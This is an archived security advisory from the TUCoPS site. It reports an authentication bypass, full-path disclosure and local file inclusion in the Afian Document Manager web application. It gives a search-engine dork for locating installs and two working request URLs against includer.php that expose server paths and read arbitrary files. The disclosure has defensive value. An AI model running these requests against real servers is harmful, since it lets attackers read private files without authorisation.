TUCoPS :: HP Unsorted A :: va2737.htm

Afian Document Manager Local File Inclusion
Afian Document Manager Local File Inclusion
Afian Document Manager Local File Inclusion


Afian is an application that can add, in just minutes, powerful document management capabilities to any Web server. It provides an Web-based interface for documents residing on the Web server's file system.

This software has a secutity hole allow attackers download any files if they know the path.

Vendor: afian.com
Vulnerabilities: Bypass + Fullpath Disclosure + Local File Inclusion.
Version: Unknown (maybe 2.x.x)
Demo: http://demo.afian.com 

Exploit:
Google Dork: Afian document manager

1. Bypass+Fullpath Disclosure:
http://site/path/css/includer.php?files=NOT_EXIST_FILE 
It doesn't ask username/password and display fullpath.
2. Local File Inclusion: Read any files if know exactly path_of_file
http://site/path/css/includer.php?files=PATH_TO_FILE

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH